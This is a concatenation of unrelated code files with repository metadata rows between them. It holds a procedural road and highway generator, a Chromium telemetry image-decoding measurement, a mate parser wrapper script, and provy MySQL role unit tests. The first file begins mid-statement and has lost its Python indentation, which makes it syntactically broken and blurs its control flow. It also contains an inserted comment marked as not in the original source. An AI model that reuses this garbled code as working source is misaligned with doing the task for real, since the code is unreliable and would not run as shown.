self.def_uv_tform(*args,**kwargs),**kwargs)
self._default_('grit_renderingdistance',1000,**kwargs)
self._default_('grit_lod_renderingdistance',2000,**kwargs)
self._default_('consumes_children',True,**kwargs)
self._default_('road_width', 10, **kwargs)
self._default_('road_height', 1, **kwargs)
self.clip_length = clip_length
self.set_segmented_vertices(*args, **kwargs)
self.set_corners(self.segmented_vertices)
segs = self.make_segments(*args, **kwargs)
litter = self.litter(segs)
self.primitives = segs + litter
node.__init__(self, *args, **kwargs)
def pick_seg_count(self, vs):
ds = mpu.distance(vs[0],vs[-1])
seglen = 15
return int(ds/seglen)
def litter(self, segs):
lit = []
return lit
def terrain_points(self):
tpts = []
for corns in self.corners:
tcorns = mpu.translate_coords(corns[:],[0,0,-0.25])
tcorns = mpu.dice_edges(tcorns, dices = 1)
mcorns = [tcorns[3],tcorns[7]]
mpu.translate_coords(mcorns,[0,0,-0.25])
tpts.extend([tc for tc in tcorns if not tc in tpts])
return tpts
def set_corners(self, verts):
corners = []
vcnt = len(verts)
for sgdx in range(1,vcnt):
p1,p2 = verts[sgdx-1],verts[sgdx]
corns = self.make_corners(p1,p2)
corners.append(corns)
self.corners = corners
def make_corners(self, p1, p2):
widt = self.road_width
p1_p2 = mpu.v1_v2(p1,p2)
leng = mpu.magnitude(p1_p2)
p1_p2 = mpu.normalize(p1_p2)
ang_z = fu.angle_from_xaxis(p1_p2)
corns = [[0,-widt/2.0,0],[leng,-widt/2.0,0],
[leng,widt/2.0,0],[0,widt/2.0,0]]
mpu.rotate_z_coords(corns,ang_z)
mpu.translate_coords(corns,p1)
mpu.translate_coords(corns[1:3],[0,0,p2[2]-p1[2]])
return corns
def get_bbox(self):
bboxes = []
for corns in self.corners:
bboxes.append(mpbb.bbox(corners = corns))
#bboxes.append(fu.bbox(corners = corns))
return bboxes
def get_cardinal_normals(self, dirs):
def getcardnorm(dx):
cardx = cardinal_directions.index(dirs[dx])
cardn = cardinal_norms[cardx]
return cardn
norms = [getcardnorm(x) for x in range(2)]
return norms
def info_from_topology(self, *args, **kwargs):
topol = kwargs['topology']
nodes = kwargs['nodes']
st,en = topol[nodes[0]],topol[nodes[1]]
stp = st['inter']['position']
enp = en['inter']['position']
return stp, enp
def set_segmented_vertices(self, *args, **kwargs):
kweys = kwargs.keys()
if 'topology' in kweys:
stp, enp = self.info_from_topology(*args, **kwargs)
else:
stp = kwargs['start']
enp = kwargs['end']
dirs = kwargs['directions']
norms = self.get_cardinal_normals(dirs)
self.stnorm = norms[0]
self.ednorm = mpu.flip(norms[1])
segdice = True
verts = [stp,enp]
verts = self.clip_tips(verts,norms[0],norms[1])
verts = self.add_tips(verts,norms[0],norms[1])
scnt = self.pick_seg_count(verts)
self.segment_count = scnt
def bend(vs):
tips = vs[:2] + vs[-2:]
cox,coy,coz = [list(i) for i in zip(*tips)]
tim = [0.0,1.0,2.0,3.0]
alpha = 1.0/2.0
mpu.parameterize_time(tips,tim,alpha)
cox = mpu.catmull_rom(cox,tim,scnt)
coy = mpu.catmull_rom(coy,tim,scnt)
coz = mpu.catmull_rom(coz,tim,scnt)
new = [list(i) for i in zip(cox,coy,coz)]
return new
if segdice: verts = bend(verts)
self.segmented_vertices = verts
return verts
def add_tips(self,verts,n1,n2):
clip = 25
v1 = verts[0][:]
v2 = verts[1][:]
cl1,cl2 = clip,clip
mpu.translate_vector(v1,mpu.scale_vector(n1[:],[cl1,cl1,cl1]))
mpu.translate_vector(v2,mpu.scale_vector(n2[:],[cl2,cl2,cl2]))
verts.extend([v1, v2])
verts.append(verts.pop(-3))
return verts
def clip_tips(self,verts,n1,n2):
cl = self.clip_length
v1 = mpu.translate_vector(verts[0][:],
mpu.scale_vector(n1[:],[cl,cl,cl]))
v2 = mpu.translate_vector(verts[-1][:],
mpu.scale_vector(n2[:],[cl,cl,cl]))
verts[0] = v1
verts[1] = v2
return verts
def make_segments(self, *args, **kwargs):
verts = self.segmented_vertices
rw = self.road_width
rh = self.road_height
segments = []
vcnt = len(verts)
tangs = [self.stnorm]
angs = []
for sgdx in range(1,vcnt):
p1,p2 = verts[sgdx-1],verts[sgdx]
tangs.append(mpu.normalize(mpu.v1_v2(p1,p2)))
tangs.append(self.ednorm)
for tgdx in range(1,vcnt+1):
t1,t2 = tangs[tgdx-1],tangs[tgdx]
a12 = fu.angle_between_xy(t1,t2)
sign = 0.0 if a12 == 0.0 else a12/abs(a12)
if abs(a12) > np.pi/2:
a12 = 0.0
angs.append(sign * abs(a12))
legs = [True]*vcnt
legs[1::2] = [False]*(int(vcnt/2))
for sgdx in range(1,vcnt):
a1,a2 = angs[sgdx-1],angs[sgdx]
p1,p2 = verts[sgdx-1],verts[sgdx]
strips = self.make_segment(p1,p2,rw,rh,a1,a2,legs[sgdx])
#segments.append(strip)
segments.extend(strips)
return segments
def make_segment(self, p1, p2, widt, depth, a1, a2, leg = False):
leng = mpu.distance_xy(p1,p2)
p1_p2 = mpu.normalize(mpu.v1_v2(p1,p2))
zdiff = p2[2] - p1[2]
ang_z = fu.angle_from_xaxis_xy(p1_p2)
#strip = ucube()
strip = self.road_prim_type()#road_segment_primitive()
#strip = road_segment_primitive()
strip.scale([leng,widt,depth])
strip.scale_uvs([leng/widt,1,1])
strip.translate([leng/2.0,0,-depth])
strip.rotate_z(ang_z)
theta1 = -1.0*a1/2.0
theta2 = a2/2.0
strip.rotate_z_face(theta1, 'left')
strip.translate_face([0,0,zdiff], 'right')
strip.rotate_z_face(theta2, 'right')
strip.translate(p1)
return [strip]
class road_system(node):
def __init__(self, *args, **kwargs):
self._default_('name','road_system',**kwargs)
self._default_('reuse',False,**kwargs)
self._default_('linkmin', 200, **kwargs)
self._default_('linkmax', 400, **kwargs)
self._default_('linkangles',
[90*x for x in range(4)], **kwargs)
self._default_('growth_tips', 5, **kwargs)
self._default_('region_bounds',[(0,1000),(0,1000)],**kwargs)
self._default_('seeds',[[0,0,0],[1000,1000,0]],**kwargs)
self._default_('intersection_count',20,**kwargs)
rwidth = 2*clip_length*tan(fu.to_rad(22.5))
self._default_('road_width', rwidth, **kwargs)
#kwargs['road_width'] = rwidth
children = self.reusing(*args, **kwargs)
if not children:children = self.children_from_kwargs(*args,**kwargs)
self._default_('tform',self.def_tform(*args,**kwargs),**kwargs)
self.add_child(*children)
node.__init__(self, *args, **kwargs)
def children_from_kwargs(self, *args, **kwargs):
rwidth = self.road_width
if 'interargs' in kwargs.keys():
interargs = kwargs['interargs']
children = self.make_system_from_intersections(interargs,rwidth)
else: children = self.make_primitives_web(*args, **kwargs)
return children
# will be class specific
def children_from_reuse_file(self, info_file_name):
info_file_name = os.path.join(os.getcwd(),info_file_name)
self.reuse_data = pk.load_pkl(info_file_name)
#self.reuse_data = {'rargs':[],'iargs':[],'topology':None}
elements = []
self.roads = []
for ig in self.reuse_data['iargs']:
elements.append(intersection(**ig))
for rarg in self.reuse_data['rargs']:
newrd = road(**rarg)
self.roads.append(newrd)
elements.append(newrd)
self.topology = self.reuse_data['topology']
return elements
def output_reuse_file(self, info_file_name):
info_file_name = os.path.join(os.getcwd(),info_file_name)
pk.save_pkl(self.reuse_data, info_file_name)
def reusing(self, *args, **kwargs):
if not self.reuse or not self.name: return
info_file_name = '.'.join([self.name,'reusable','data','pkl'])
if not pk.file_exists(info_file_name):
chds = self.children_from_kwargs(*args, **kwargs)
self.output_reuse_file(info_file_name)
return chds
else:
chds = self.children_from_reuse_file(info_file_name)
return chds
def terrain_points(self):
#pts = [ch.tform.true().position for ch in self.children]
pts = []
[pts.extend(ch.owner.terrain_points())
for ch in self.tform.children]
return pts
def make_primitives_web(self, *args, **kwargs):
def good_dir(tip, ang):
link = rm.choice(range(linkmin,linkmax,50))
#link = rm.randrange(linkmin,linkmax)
tippos = tip['position'][:]
angrad = (np.pi/180.0)*ang
z_off_min = -25
z_off_max = 25
z_offset = rm.randrange(z_off_min, z_off_max)
offset = [link*cos(angrad),link*sin(angrad),z_offset]
newtip = mpu.translate_vector(tippos, offset)
if not mpu.in_region(region_bounds, newtip):
return False,None
for ipos in [i['position'] for i in interargs]:
d = mpu.distance(newtip, ipos)
if d < linkmin: return False,None
return True,newtip
def get_angle(tip):
nodes = [i['position'] for i in interargs]
cmass = [np.mean([s[0] for s in nodes]), np.mean([s[1]
for s in nodes]), np.mean([s[2] for s in nodes])]
#cmass = [0,0,0]
cmass_ang = fu.to_deg(fu.angle_from_xaxis(
mpu.v1_v2(tip['position'],cmass)))
tangs = angs[:]
angdists = [abs(x-cmass_ang) for x in tangs]
closestang = tangs[angdists.index(min(angdists))]
tangs.extend([closestang]*20)
while len(tangs) > 0:
angdx = rm.randrange(len(tangs))
ang = tangs.pop(angdx)
passes,newpos = good_dir(tip, ang)
if passes:
return ang,newpos
return None,None
def place_inter(tip):
ang,newpos = get_angle(tip)
if ang is None: return
return newpos
growth_tips = self.growth_tips
region_bounds = self.region_bounds
linkmin, linkmax = self.linkmin,self.linkmax
seeds = self.seeds
angs = self.linkangles
intercnt = self.intersection_count
seedcnt = len(seeds)
branches = []
for idx in range(seedcnt):
branches.append([{
'position' : seeds[idx],
}])
interargs = [br[0] for br in branches]
sealevelvals = []
for idx in range(intercnt):
tips = [br[-min([len(interargs),growth_tips]):]
for br in branches]
bdx = rm.randrange(seedcnt)
tip = rm.choice(tips[bdx])
newpos = place_inter(tip)
if not newpos is None:
sealevelvals.append(newpos[2])
interargs.append({
'position' : newpos,
})
branches[bdx].append(interargs[-1])
            else: print("can't place intersection!!")
#rwidth = kwargs['road_width']
rwidth = self.road_width
self._suggested_sea_level_ = self.pick_sea_level(sealevelvals)
return self.make_system_from_intersections(interargs, rwidth)
def pick_sea_level(self, vals):
maxval = max(vals)
minval = min(vals)
rng = maxval - minval
return minval + rng/10.0
def make_system_from_intersections(self, interargs, rwidth):
elements = []
topology = [{} for inter in interargs]
for inter, topo in zip(interargs, topology):
for card in cardinal_directions:
topo[card] = None
topo['inter'] = inter
topo['roads'] = []
topo['linkcnt'] = 0
self.reuse_data = {'rargs':[],'iargs':[],'topology':None}
self.roads = []
self.highways = []
for tdx, topo in enumerate(topology):
topology[tdx] = find_neighbors(topology,topo,rwidth)
rdbbs = []
hwbbs = []
for tdx, topo in enumerate(topology):
inter = topo['inter']
inter['topology'] = topology
inter['topodex'] = tdx
self.reuse_data['iargs'].append(inter)
elements.append(intersection(**inter))
for rarg in topo['roads']:
self.reuse_data['rargs'].append(rarg)
newrd = road(**rarg)
newbb = newrd.get_bbox()
if not mpbb.intersects(rdbbs,newbb):
rdbbs.extend(newbb)
self.roads.append(newrd)
elements.append(newrd)
else:
newrd = highway(**rarg)
newbb = newrd.get_bbox()
if not mpbb.intersects(hwbbs,newbb):
hwbbs.extend(newbb)
self.highways.append(newrd)
elements.append(newrd)
print('topology mistake from road intersection!')
self.topology = topology
self.reuse_data['topology'] = topology
return elements
def make_primitives_from_blocks(self, *args, **kwargs):
prims = []
# given a list of blocks, determine a set of roads which bounds them
        # assume they do not overlap, and that a road should bound each
# determine locations of intersections as all corners of every block
# determine the width, length, and position of each road connecting
# intersections
# also assume that intersections will never intersect by construction
# that is the blocks are sized/positioned to prevent strange
# intersections
# create the kwargs which includes them all
def get_inter_length():
return 40
def get_inter_width():
return 40
blocks = args[0]
used_bcorners = []
corner_signs = [(-1,-1), (0, -1), (0, 0), (-1, 0)]
interargs = []
for bl in blocks:
corn = bl.corners
c1, c2, c3, c4 = corn
for c_, signs in zip(corn, corner_signs):
ilength = get_inter_length()
iwidth = get_inter_width()
ipos = mpu.translate_vector(c_[:],
[signs[0]*ilength,signs[1]*iwidth,0]),
if not ipos in used_bcorners:
used_bcorners.append(ipos)
interargs.append({
'name' : 'intersection_' + str(len(used_bcorners)),
'position' : mpu.translate_vector(
c_[:],[signs[0]*ilength,signs[1]*iwidth,0]),
'length' : ilength,
'width' : iwidth,
'floor_height' : 1.0})
return self.make_system_from_intersections(interargs)
def get_bbox(self):
bboxes = []
roads = self.tform.children
for rdtf in roads:
rdboxes = rdtf.owner.get_bbox()
bboxes.extend(rdboxes)
return bboxes
class highway(road):
road_prim_type = highway_segment_primitive
def terrain_points(self):
tpts = [mpu.translate_vector(l,[0,0,5])
for l in self.leg_positions]
return tpts
def make_segments(self, *args, **kwargs):
self.leg_positions = []
scnt = self.segment_count
sverts = self.segmented_vertices
self.sverts_ground = self.segmented_vertices[:]
#sverts[1][2] += 1
#sverts[-2][2] += 1
tim = [0.0,1.0,2.0,3.0]
alpha = 1.0/2.0
tips = sverts[:2] + sverts[-2:]
#tips = sverts[1:3] + sverts[-3:-1]
coz = [t[2] for t in tips]
mpu.parameterize_time(tips,tim,alpha)
coz = mpu.catmull_rom(coz,tim,scnt)
for sv,co in zip(sverts[1:-1],coz): sv[2] = min(co,sv[2]+20)
rdsegs = road.make_segments(self, *args, **kwargs)
return rdsegs
def make_leg(self, v):
leg = pr.ucube()
leg_leng = 20
leg.scale([5,5,leg_leng])
leg_pos = [v[0],v[1],v[2]-leg_leng-2.0]
leg.translate(leg_pos)
self.leg_positions.append(leg_pos)
return leg
def make_segment(self, p1, p2, widt, depth, a1, a2, leg = False):
depth = 8 # unacceptable...
rs = road.make_segment(self,p1,p2,widt,depth,a1,a2)
[r.translate([0,0,1.75]) for r in rs]# unacceptable...
# use a bbox check to decide to place a leg or not
if not leg: return rs
leg = self.make_leg(p1)
rs.append(leg)
return rs
def pick_closest(pots,ndists):
if pots:
ndx = ndists.index(min(ndists))
return pots[ndx]
return None,None
def select_outlet(outlets,ordered):
for ord_ in ordered:
if ord_ in outlets:
return ord_
def north_check(topology,topo,seek_fov,linkmax):
antidirs = ['west','southwest','south','southeast','east']
tpos = topo['inter']['position']
potentials = []
ndists = []
tthresh = 50
max_slope = 0.5
for pntopo in topology:
outlets = [ake for ake in antidirs if pntopo[ake] is None]
if outlets:
pnpos = pntopo['inter']['position']
if tpos[1] < pnpos[1]:
ndist = float(pnpos[1] - tpos[1])
zdiff = abs(tpos[2] - pnpos[2])
slope = zdiff/abs(ndist)
if slope > max_slope: continue
if ndist < linkmax:
tdist = float(pnpos[0] - tpos[0])
pn_fov_theta = fu.to_deg(np.arctan(abs(tdist)/ndist))
if pn_fov_theta < seek_fov/2.0:
if abs(tdist) <= tthresh:
order = ['south','southeast','southwest']
elif tdist < -tthresh:
order = ['southeast','south','east']
elif tdist > tthresh:
order = ['southwest','south','west']
dir_ = select_outlet(outlets,order)
if not dir_ is None:
potentials.append((pntopo,dir_))
ndists.append(ndist)
return pick_closest(potentials,ndists)
def south_check(topology,topo,seek_fov,linkmax):
antidirs = ['west','northwest','north','northeast','east']
tpos = topo['inter']['position']
potentials = []
ndists = []
tthresh = 50
max_slope = 0.5
for pntopo in topology:
outlets = [ake for ake in antidirs if pntopo[ake] is None]
if outlets:
pnpos = pntopo['inter']['position']
if tpos[1] > pnpos[1]:
ndist = -1*float(pnpos[1] - tpos[1])
zdiff = abs(tpos[2] - pnpos[2])
slope = zdiff/abs(ndist)
if slope > max_slope: continue
if ndist < linkmax:
tdist = float(pnpos[0] - tpos[0])
pn_fov_theta = fu.to_deg(np.arctan(abs(tdist)/ndist))
if pn_fov_theta < seek_fov/2.0:
if abs(tdist) <= tthresh:
order = ['north','northeast','northwest']
elif tdist < -tthresh:
order = ['northeast','north','east']
elif tdist > tthresh:
order = ['northwest','north','west']
dir_ = select_outlet(outlets,order)
if not dir_ is None:
potentials.append((pntopo,dir_))
ndists.append(ndist)
return pick_closest(potentials,ndists)
def east_check(topology,topo,seek_fov,linkmax):
antidirs = ['north','northwest','west','southwest','south']
tpos = topo['inter']['position']
potentials = []
ndists = []
normdx = 0
trandx = 1
tthresh = 50
max_slope = 0.5
for pntopo in topology:
outlets = [ake for ake in antidirs if pntopo[ake] is None]
if outlets:
pnpos = pntopo['inter']['position']
if tpos[normdx] < pnpos[normdx]:
ndist = float(pnpos[normdx] - tpos[normdx])
zdiff = abs(tpos[2] - pnpos[2])
slope = zdiff/abs(ndist)
if slope > max_slope: continue
if ndist < linkmax:
tdist = float(pnpos[trandx] - tpos[trandx])
pn_fov_theta = fu.to_deg(np.arctan(abs(tdist)/ndist))
if pn_fov_theta < seek_fov/2.0:
if abs(tdist) <= tthresh:
order = ['west','southwest','northwest']
elif tdist < -tthresh:
order = ['northwest','west','north']
elif tdist > tthresh:
order = ['southwest','west','south']
dir_ = select_outlet(outlets,order)
if not dir_ is None:
potentials.append((pntopo,dir_))
ndists.append(ndist)
return pick_closest(potentials,ndists)
def west_check(topology,topo,seek_fov,linkmax):
antidirs = ['north','northeast','east','southeast','south']
tpos = topo['inter']['position']
potentials = []
ndists = []
normdx = 0
trandx = 1
tthresh = 50
max_slope = 0.5
for pntopo in topology:
outlets = [ake for ake in antidirs if pntopo[ake] is None]
if outlets:
pnpos = pntopo['inter']['position']
if tpos[normdx] > pnpos[normdx]:
ndist = -1*float(pnpos[normdx] - tpos[normdx])
zdiff = abs(tpos[2] - pnpos[2])
slope = zdiff/abs(ndist)
if slope > max_slope: continue
if ndist < linkmax:
tdist = float(pnpos[trandx] - tpos[trandx])
pn_fov_theta = fu.to_deg(np.arctan(abs(tdist)/ndist))
if pn_fov_theta < seek_fov/2.0:
if abs(tdist) <= tthresh:
order = ['east','southeast','northeast']
elif tdist < -tthresh:
order = ['northeast','east','north']
elif tdist > tthresh:
order = ['southeast','east','south']
dir_ = select_outlet(outlets,order)
if not dir_ is None:
potentials.append((pntopo,dir_))
ndists.append(ndist)
return pick_closest(potentials,ndists)
neighbor_checks = {
'north' : north_check,
'east' : east_check,
'south' : south_check,
'west' : west_check,
}
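# Hedged clarifying note (not in the original source): find_neighbors() below
# dispatches through this dict, so neighbor_checks['north'](topology, topo,
# seek_fov, linkmax) returns the closest intersection roughly north of `topo`
# (within the field of view and link distance) together with the outlet
# direction to attach on the neighbour's side, or (None, None) if none fits.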
def find_neighbors(topology,topo,rwidth):
topoid = [t is topo for t in topology].index(True)
seek_fov = 60
maxlinks = 4
linkmax = 1000
for card in cardinal_directions:
if topo['linkcnt'] >= maxlinks: return topo
if not card in neighbor_checks.keys(): continue
neighb,neighbdir = neighbor_checks[card](
topology,topo,seek_fov,linkmax)
if not neighb is None:
topodx = [n is neighb for n in topology].index(True)
if neighb['linkcnt'] >= maxlinks: continue
if topodx in topo.values(): continue
topo[card] = topodx
topo['linkcnt'] += 1
neighb[neighbdir] = topoid
neighb['linkcnt'] += 1
topo['roads'].append({
'road_width' : rwidth,
'topology' : topology,
'directions' : (card,neighbdir),
'nodes' : (topoid,topodx)})
return topo
def no_road_intersects(topology,idx1,idx2):
topo1 = topology[idx1]
topo2 = topology[idx2]
s1 = (topo1['inter']['position'],
topo2['inter']['position'],)
cardinals = ['north', 'south', 'east', 'west']
for x in topology:
links = [x[key] for key in cardinals if not x[key] is None]
for ldx in links:
y = topology[ldx]
s2 = (x['inter']['position'],
y['inter']['position'],)
if mpu.segments_intersect(s1,s2): return False
return True
|
gpl-2.0
| -6,110,025,529,739,502,000
| 36.849315
| 77
| 0.533991
| false
| 3.385684
| false
| false
| false
|
loopCM/chromium
|
tools/perf/perf_tools/image_decoding_measurement.py
|
1
|
1268
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from telemetry.page import page_measurement
class ImageDecoding(page_measurement.PageMeasurement):
def WillNavigateToPage(self, page, tab):
tab.StartTimelineRecording()
def MeasurePage(self, page, tab, results):
tab.StopTimelineRecording()
def _IsDone():
return tab.EvaluateJavaScript('isDone')
decode_image_events = \
tab.timeline_model.GetAllOfName('DecodeImage')
# If it is a real image page, then store only the last-minIterations
# decode tasks.
if (hasattr(page,
'image_decoding_measurement_limit_results_to_min_iterations') and
page.image_decoding_measurement_limit_results_to_min_iterations):
assert _IsDone()
min_iterations = tab.EvaluateJavaScript('minIterations')
decode_image_events = decode_image_events[-min_iterations:]
durations = [d.duration for d in decode_image_events]
if not durations:
results.Add('ImageDecoding_avg', 'ms', 'unsupported')
return
image_decoding_avg = sum(durations) / len(durations)
results.Add('ImageDecoding_avg', 'ms', image_decoding_avg)
|
bsd-3-clause
| 44,070,709,298,462,310
| 36.294118
| 80
| 0.708991
| false
| 3.865854
| false
| false
| false
|
kimgerdes/arborator
|
lib/parser.py
|
1
|
3443
|
# -*- coding: utf-8 -*-
#!/usr/bin/python
import argparse, datetime, glob, os
from mate import parsing, createNonExistingFolders
from retokenisation import retokeniser
from conll import makeEmpty
memory="40G"
def parseFile(infile, lemodel, tagmodel, parsemodel, folderpref="mate/parses/"):
timestamp=datetime.datetime.now().strftime('%Y-%m-%d_%H:%M')
if folderpref: prelimfolder=folderpref+"_prelim/"
else: prelimfolder=folderpref+timestamp+"_prelim/"
parsefile = parsing(infile=infile, lemodel=lemodel, tagmodel=tagmodel,parsemodel=parsemodel , outfolder=prelimfolder, memory=memory) # , depparse=False
#parsefile="mate/parses/2016-09-22_01:18/Louise_Liotard_F_85_et_Jeanne_Mallet_F_75_SO-2-one-word-per-line.conll14_parse"
print "retokenizing..."
newname=retokeniser(parsefile, addtoout="_retok")
print "retokenization done"
if folderpref: outfolder=folderpref+"/"
else: outfolder=folderpref+timestamp+"/"
createNonExistingFolders(outfolder)
emptyname=makeEmpty(newname, outfolder=outfolder)
	parsefile = parsing(infile=emptyname, lemodel=lemodel, tagmodel=tagmodel, parsemodel=parsemodel, outfolder=outfolder, memory=memory)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='wrapper for mate parser with orfeo dictionaries')
parser.add_argument('-ci','--conllinfile', help='file to be parsed', type=lambda s: unicode(s, 'utf8'), required=False)
parser.add_argument('-cf','--conllfilter', help='files to be parsed', type=lambda s: unicode(s, 'utf8'), required=False)
parser.add_argument('-md','--modeldir', help='folder containing the models', type=lambda s: unicode(s, 'utf8'), required=True)
parser.add_argument('-lm','--lemmodel', help='lemmatizing model', type=lambda s: unicode(s, 'utf8'), required=False, nargs='?', default="LemModel")
parser.add_argument('-tm','--tagmodel', help='tagging model', type=lambda s: unicode(s, 'utf8'), required=False, nargs='?', default="TagModel")
parser.add_argument('-pm','--parsemodel', help='parsing model', type=lambda s: unicode(s, 'utf8'), required=False, nargs='?', default="ParseModel")
args = vars(parser.parse_args())
modeldir=args.get("modeldir",".")
infile=args.get("conllinfile",None)
conllfilter=args.get("conllfilter",None)
lemodel=modeldir+args.get("lemmodel",None)
tagmodel=modeldir+args.get("tagmodel",None)
parsemodel=modeldir+args.get("parsemodel",None)
if infile:
parseFile(infile, lemodel, tagmodel, parsemodel)
elif conllfilter:
timestamp=datetime.datetime.now().strftime('%Y-%m-%d_%H:%M')
for infile in glob.glob(conllfilter):
head, tail = os.path.split(infile) # put the parse output next to the infile
parseFile(infile, lemodel, tagmodel, parsemodel, folderpref=head+"/"+timestamp)
# python parser.py -ci mate/AParser/echantillon/Louise_Liotard_F_85_et_Jeanne_Mallet_F_75_SO-2-one-word-per-line.conll14 -lm mate/AParser/LemModel -tm mate/AParser/TagModel -pm mate/AParser/ParseModel
# python parser.py -ci mate/AParser/echantillon/Louise_Liotard_F_85_et_Jeanne_Mallet_F_75_SO-2-one-word-per-line.conll14 -md mate/AParser/
# python parser.py -ci mate/AParser/echantillon/Louise_Liotard_F_85_et_Jeanne_Mallet_F_75_SO-2-one-word-per-line.conll14 -md mate/AParser/
# python parser.py -cf "mate/AParser/echantillon/*.conll14" -md mate/AParser/
# python parser.py -cf "mate/AParser/tcof/*.conll14" -md mate/AParser/
|
agpl-3.0
| -919,325,971,577,784,000
| 56.4
| 211
| 0.743247
| false
| 2.854892
| false
| false
| false
|
python-provy/provy
|
tests/unit/more/centos/database/test_mysql.py
|
1
|
11786
|
from mock import call, patch
from nose.tools import istest
from .fixtures import (
FOO_DB_WITH_JOHN_GRANTS,
FOO_DB_WITHOUT_JOHN_GRANTS,
FOO_DB_WITH_JOHN_GRANTS_AND_GRANT_OPTION,
HOSTS_FOR_USER,
DATABASES,
)
from provy.more.centos import YumRole, MySQLRole
from tests.unit.tools.helpers import ProvyTestCase
class MySQLRoleTest(ProvyTestCase):
def setUp(self):
super(MySQLRoleTest, self).setUp()
self.role = MySQLRole(prov=None, context={})
@istest
def has_no_grant_if_not_granted(self):
with self.execute_mock() as execute:
execute.return_value = FOO_DB_WITHOUT_JOHN_GRANTS
self.assertFalse(self.role.has_grant('ALL', 'foo', 'john', '%', False))
execute.assert_called_with('''mysql -u root -E -e "SHOW GRANTS FOR 'john'@'%';" mysql''', sudo=True, stdout=False)
@istest
def has_grant_if_granted(self):
with self.execute_mock() as execute:
execute.return_value = FOO_DB_WITH_JOHN_GRANTS
self.assertTrue(self.role.has_grant('ALL', 'foo', 'john', '%', False))
execute.assert_called_with('''mysql -u root -E -e "SHOW GRANTS FOR 'john'@'%';" mysql''', sudo=True, stdout=False)
@istest
def has_grant_if_granted_with_grant_option(self):
with self.execute_mock() as execute:
execute.return_value = FOO_DB_WITH_JOHN_GRANTS_AND_GRANT_OPTION
self.assertTrue(self.role.has_grant('ALL', 'foo', 'john', '%', True))
execute.assert_called_with('''mysql -u root -E -e "SHOW GRANTS FOR 'john'@'%';" mysql''', sudo=True, stdout=False)
@istest
def has_grant_if_granted_even_if_provided_full(self):
with self.execute_mock() as execute:
execute.return_value = FOO_DB_WITH_JOHN_GRANTS
self.assertTrue(self.role.has_grant('ALL PRIVILEGES', 'foo', 'john', '%', False))
execute.assert_called_with('''mysql -u root -E -e "SHOW GRANTS FOR 'john'@'%';" mysql''', sudo=True, stdout=False)
@istest
def has_grant_if_granted_even_if_provided_as_lowercase_string(self):
with self.execute_mock() as execute:
execute.return_value = FOO_DB_WITH_JOHN_GRANTS
self.assertTrue(self.role.has_grant('all', 'foo', 'john', '%', False))
execute.assert_called_with('''mysql -u root -E -e "SHOW GRANTS FOR 'john'@'%';" mysql''', sudo=True, stdout=False)
@istest
def can_get_user_grants(self):
with self.execute_mock() as execute:
execute.return_value = FOO_DB_WITHOUT_JOHN_GRANTS
expected = ["GRANT USAGE ON *.* TO 'john'@'%' IDENTIFIED BY PASSWORD '*B9EE00DF55E7C816911C6DA56F1E3A37BDB31093'"]
self.assertEqual(expected, self.role.get_user_grants('john', '%'))
execute.assert_called_with('''mysql -u root -E -e "SHOW GRANTS FOR 'john'@'%';" mysql''', sudo=True, stdout=False)
@istest
def installs_necessary_packages_to_provision(self):
with self.using_stub(YumRole) as mock_yum, self.execute_mock() as execute:
mock_yum.ensure_package_installed.return_value = 'some result'
self.role.provision()
self.assertEqual(execute.mock_calls, [
call("mysqladmin -u %s -p'temppass' password '%s'" % (self.role.mysql_root_user, self.role.mysql_root_pass),
stdout=False, sudo=True),
])
self.assertEqual(mock_yum.ensure_package_installed.mock_calls, [
call('mysql-server'),
call('mysql-devel'),
call('mysql-libs'),
])
@istest
def installs_necessary_packages_to_provision_again(self):
with self.using_stub(YumRole) as mock_yum, self.execute_mock() as execute:
mock_yum.ensure_package_installed.return_value = False
self.role.provision()
self.assertFalse(execute.called)
self.assertEqual(mock_yum.ensure_package_installed.mock_calls, [
call('mysql-server'),
call('mysql-devel'),
call('mysql-libs'),
])
@istest
def gets_user_hosts(self):
with self.execute_mock() as execute:
execute.return_value = HOSTS_FOR_USER
hosts = self.role.get_user_hosts('root')
self.assertEqual(hosts, [
'127.0.0.1',
'::1',
'my-desktop',
'localhost',
])
execute.assert_called_with('''mysql -u root -E -e "select Host from mysql.user where LOWER(User)='root'" mysql''',
sudo=True, stdout=False)
@istest
def gets_user_hosts_using_password(self):
with self.execute_mock() as execute:
execute.return_value = HOSTS_FOR_USER
self.role.mysql_root_pass = 'mypass'
hosts = self.role.get_user_hosts('root')
self.assertEqual(hosts, [
'127.0.0.1',
'::1',
'my-desktop',
'localhost',
])
execute.assert_called_with('''mysql -u root --password="mypass" -E -e "select Host from mysql.user where LOWER(User)='root'" mysql''',
sudo=True, stdout=False)
@istest
def gets_empty_user_hosts(self):
with self.execute_mock() as execute:
execute.return_value = ''
hosts = self.role.get_user_hosts('root')
self.assertEqual(hosts, [])
execute.assert_called_with('''mysql -u root -E -e "select Host from mysql.user where LOWER(User)='root'" mysql''',
sudo=True, stdout=False)
@istest
def checks_that_a_user_exists(self):
with patch.object(self.role, 'get_user_hosts') as get_user_hosts:
get_user_hosts.return_value = ['localhost']
self.assertTrue(self.role.user_exists('johndoe', 'localhost'))
get_user_hosts.assert_called_with('johndoe')
@istest
def checks_that_a_user_doesnt_exist(self):
with patch.object(self.role, 'get_user_hosts') as get_user_hosts:
get_user_hosts.return_value = ['localhost']
self.assertFalse(self.role.user_exists('johndoe', 'somewhere-else'))
get_user_hosts.assert_called_with('johndoe')
@istest
def creates_a_user_if_it_doesnt_exist_yet(self):
with patch.object(self.role, 'user_exists') as user_exists, self.execute_mock() as execute:
user_exists.return_value = False
result = self.role.ensure_user('johndoe', 'mypass', 'localhost')
self.assertTrue(result)
execute.assert_called_with("""mysql -u root -e "CREATE USER 'johndoe'@'localhost' IDENTIFIED BY 'mypass';" mysql""", sudo=True, stdout=False)
@istest
def doesnt_create_user_if_it_already_exists(self):
with patch.object(self.role, 'user_exists') as user_exists, self.execute_mock() as execute:
user_exists.return_value = True
result = self.role.ensure_user('johndoe', 'mypass', 'localhost')
self.assertFalse(result)
self.assertFalse(execute.called)
@istest
def creates_a_user_with_mysql_password(self):
with patch.object(self.role, 'user_exists') as user_exists, self.execute_mock() as execute:
user_exists.return_value = False
self.role.mysql_root_pass = 'otherpass'
result = self.role.ensure_user('johndoe', 'mypass', 'localhost')
self.assertTrue(result)
execute.assert_called_with("""mysql -u root --password="otherpass" -e "CREATE USER 'johndoe'@'localhost' IDENTIFIED BY 'mypass';" mysql""",
sudo=True, stdout=False)
